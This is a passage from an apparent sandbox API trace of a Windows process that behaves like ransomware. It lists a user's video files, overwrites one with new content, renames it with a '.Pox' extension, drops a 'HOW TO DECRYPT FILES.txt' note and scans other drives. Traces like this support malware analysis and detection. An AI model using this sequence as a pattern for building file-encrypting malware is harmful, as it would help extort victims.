lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405ec8 [0042.000] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.000] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd535ec00, ftCreationTime.dwHighDateTime=0x1d4d2c8, ftLastAccessTime.dwLowDateTime=0x99e335c0, ftLastAccessTime.dwHighDateTime=0x1d4d18f, ftLastWriteTime.dwLowDateTime=0x99e335c0, ftLastWriteTime.dwHighDateTime=0x1d4d18f, nFileSizeHigh=0x0, nFileSizeLow=0xa51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="6thJezNm6cIWvHasF.mkv", cAlternateFileName="6THJEZ~1.MKV")) returned 1 [0042.000] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b5c8990, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0x836aed00, ftLastAccessTime.dwHighDateTime=0x1d4cfb5, ftLastWriteTime.dwLowDateTime=0x836aed00, ftLastWriteTime.dwHighDateTime=0x1d4cfb5, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="G7Gr8bM9Sa_dTQjcl-xf.flv", cAlternateFileName="G7GR8B~1.FLV")) returned 1 [0042.000] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0042.001] FindClose (in: hFindFile=0x405ec8 | out: hFindFile=0x405ec8) returned 1 [0042.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0042.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0042.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0042.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo", lpFilePart=0x0) returned 0x4b [0042.001] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\", lpFilePart=0x0) returned 0x4c [0042.001] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405ec8 [0042.001] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1a87790, ftCreationTime.dwHighDateTime=0x1d4c675, ftLastAccessTime.dwLowDateTime=0xd2ef7780, ftLastAccessTime.dwHighDateTime=0x1d4cfe0, ftLastWriteTime.dwLowDateTime=0xd2ef7780, ftLastWriteTime.dwHighDateTime=0x1d4cfe0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.001] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd535ec00, ftCreationTime.dwHighDateTime=0x1d4d2c8, ftLastAccessTime.dwLowDateTime=0x99e335c0, ftLastAccessTime.dwHighDateTime=0x1d4d18f, ftLastWriteTime.dwLowDateTime=0x99e335c0, ftLastWriteTime.dwHighDateTime=0x1d4d18f, nFileSizeHigh=0x0, nFileSizeLow=0xa51a, dwReserved0=0x0, dwReserved1=0x0, cFileName="6thJezNm6cIWvHasF.mkv", cAlternateFileName="6THJEZ~1.MKV")) returned 1 [0042.001] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b5c8990, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0x836aed00, ftLastAccessTime.dwHighDateTime=0x1d4cfb5, ftLastWriteTime.dwLowDateTime=0x836aed00, ftLastWriteTime.dwHighDateTime=0x1d4cfb5, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="G7Gr8bM9Sa_dTQjcl-xf.flv", cAlternateFileName="G7GR8B~1.FLV")) returned 1 [0042.002] FindNextFileW (in: hFindFile=0x405ec8, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b5c8990, ftCreationTime.dwHighDateTime=0x1d4c65d, ftLastAccessTime.dwLowDateTime=0x836aed00, ftLastAccessTime.dwHighDateTime=0x1d4cfb5, ftLastWriteTime.dwLowDateTime=0x836aed00, ftLastWriteTime.dwHighDateTime=0x1d4cfb5, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="G7Gr8bM9Sa_dTQjcl-xf.flv", cAlternateFileName="G7GR8B~1.FLV")) returned 0 [0042.002] FindClose (in: hFindFile=0x405ec8 | out: hFindFile=0x405ec8) returned 1 [0042.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0042.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0042.002] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", lpFilePart=0x0) returned 0x61 [0042.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0042.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\pylk-npuf-t0m8oo\\6thjeznm6ciwvhasf.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0042.002] GetFileType (hFile=0x26c) returned 0x1 [0042.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0042.002] GetFileType (hFile=0x26c) returned 0x1 [0042.002] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0xa51a [0042.002] ReadFile (in: hFile=0x26c, lpBuffer=0x24c9fc0, nNumberOfBytesToRead=0xa51a, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x24c9fc0*, lpNumberOfBytesRead=0x3ae414*=0xa51a, lpOverlapped=0x0) returned 1 [0042.003] CloseHandle (hObject=0x26c) returned 1 [0042.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0042.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0042.019] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0042.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3dc) returned 1 [0042.019] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", nBufferLength=0x105, lpBuffer=0x3ade58, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", lpFilePart=0x0) returned 0x61 [0042.019] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae34c) returned 1 [0042.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\pylk-npuf-t0m8oo\\6thjeznm6ciwvhasf.mkv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0042.020] GetFileType (hFile=0x26c) returned 0x1 [0042.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae348) returned 1 [0042.020] GetFileType (hFile=0x26c) returned 0x1 [0042.020] WriteFile (in: hFile=0x26c, lpBuffer=0x254a74c*, nNumberOfBytesToWrite=0xa520, lpNumberOfBytesWritten=0x3ae408, lpOverlapped=0x0 | out: lpBuffer=0x254a74c*, lpNumberOfBytesWritten=0x3ae408*=0xa520, lpOverlapped=0x0) returned 1 [0042.022] CloseHandle (hObject=0x26c) returned 1 [0042.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv", lpFilePart=0x0) returned 0x61 [0042.023] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv.Pox", nBufferLength=0x105, lpBuffer=0x3adf8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv.Pox", lpFilePart=0x0) returned 0x65 [0042.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3ec) returned 1 [0042.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\pylk-npuf-t0m8oo\\6thjeznm6ciwvhasf.mkv"), fInfoLevelId=0x0, lpFileInformation=0x3ae468 | out: lpFileInformation=0x3ae468*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd535ec00, ftCreationTime.dwHighDateTime=0x1d4d2c8, ftLastAccessTime.dwLowDateTime=0x99e335c0, ftLastAccessTime.dwHighDateTime=0x1d4d18f, ftLastWriteTime.dwLowDateTime=0x2b3b0820, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xa520)) returned 1 [0042.023] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3e8) returned 1 [0042.023] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\pylk-npuf-t0m8oo\\6thjeznm6ciwvhasf.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\uFDmIkn7ZcT9-q\\pYlk-npuf-T0m8Oo\\6thJezNm6cIWvHasF.mkv.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\qjcdr1\\ufdmikn7zct9-q\\pylk-npuf-t0m8oo\\6thjeznm6ciwvhasf.mkv.pox")) returned 1 [0042.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0042.024] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0042.024] GetFullPathNameW (in: lpFileName="D:\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="D:\\", lpFilePart=0x0) returned 0x3 [0042.024] FindFirstFileW (in: lpFileName="D:\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0042.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5dc) returned 1 [0042.025] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0042.025] GetFullPathNameW (in: lpFileName="E:\\", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="E:\\", lpFilePart=0x0) returned 0x3 [0042.026] GetFullPathNameW (in: lpFileName="E:\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="E:\\", lpFilePart=0x0) returned 0x3 [0042.026] FindFirstFileW (in: lpFileName="E:\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0042.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5dc) returned 1 [0042.027] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0042.027] GetFullPathNameW (in: lpFileName="B:\\", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="B:\\", lpFilePart=0x0) returned 0x3 [0042.027] GetFullPathNameW (in: lpFileName="B:\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="B:\\", lpFilePart=0x0) returned 0x3 [0042.027] FindFirstFileW (in: lpFileName="B:\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0042.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5dc) returned 1 [0042.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae618) returned 1 [0042.028] GetFullPathNameW (in: lpFileName="F:\\", nBufferLength=0x105, lpBuffer=0x3ae120, lpFilePart=0x0 | out: lpBuffer="F:\\", lpFilePart=0x0) returned 0x3 [0042.028] GetFullPathNameW (in: lpFileName="F:\\", nBufferLength=0x105, lpBuffer=0x3ae0f4, lpFilePart=0x0 | out: lpBuffer="F:\\", lpFilePart=0x0) returned 0x3 [0042.028] FindFirstFileW (in: lpFileName="F:\\*", lpFindFileData=0x3ae340 | out: lpFindFileData=0x3ae340*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0042.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5dc) returned 1 [0042.037] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae108, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0042.037] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5fc) returned 1 [0042.037] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x26c [0042.039] GetFileType (hFile=0x26c) returned 0x1 [0042.039] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae5f8) returned 1 [0042.039] GetFileType (hFile=0x26c) returned 0x1 [0042.041] WriteFile (in: hFile=0x26c, lpBuffer=0x25593bc*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x3ae678, lpOverlapped=0x0 | out: lpBuffer=0x25593bc*, lpNumberOfBytesWritten=0x3ae678*=0x2d3, lpOverlapped=0x0) returned 1 [0042.042] CloseHandle (hObject=0x26c) returned 1 [0042.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3ae040, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0042.290] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", nBufferLength=0x105, lpBuffer=0x3adfec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\local.exe.config", lpFilePart=0x0) returned 0x36 [0042.846] GetCurrentProcess () returned 0xffffffff [0042.846] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x3ae394 | out: TokenHandle=0x3ae394*=0x270) returned 1 [0042.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x3ade74, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e [0042.851] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae394 | out: lpFileInformation=0x3ae394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0042.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x3ade40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0042.852] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x3ae394 | out: lpFileInformation=0x3ae394*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0042.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x3addcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0042.852] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae2c0) returned 1 [0042.852] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x268 [0042.852] GetFileType (hFile=0x268) returned 0x1 [0042.852] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae2bc) returned 1 [0042.852] GetFileType (hFile=0x268) returned 0x1 [0042.861] GetFileSize (in: hFile=0x268, lpFileSizeHigh=0x3ae388 | out: lpFileSizeHigh=0x3ae388*=0x0) returned 0x8c8f [0042.861] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae344, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae344*=0x1000, lpOverlapped=0x0) returned 1 [0042.876] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae1e0, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae1e0*=0x1000, lpOverlapped=0x0) returned 1 [0042.877] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae094, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae094*=0x1000, lpOverlapped=0x0) returned 1 [0042.877] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae094, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae094*=0x1000, lpOverlapped=0x0) returned 1 [0042.877] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae094, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae094*=0x1000, lpOverlapped=0x0) returned 1 [0042.877] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3adfcc, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3adfcc*=0x1000, lpOverlapped=0x0) returned 1 [0042.885] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae148, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae148*=0x1000, lpOverlapped=0x0) returned 1 [0042.886] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae05c, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae05c*=0x1000, lpOverlapped=0x0) returned 1 [0042.886] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae05c, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae05c*=0xc8f, lpOverlapped=0x0) returned 1 [0042.886] ReadFile (in: hFile=0x268, lpBuffer=0x255e0e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x3ae11c, lpOverlapped=0x0 | out: lpBuffer=0x255e0e0*, lpNumberOfBytesRead=0x3ae11c*=0x0, 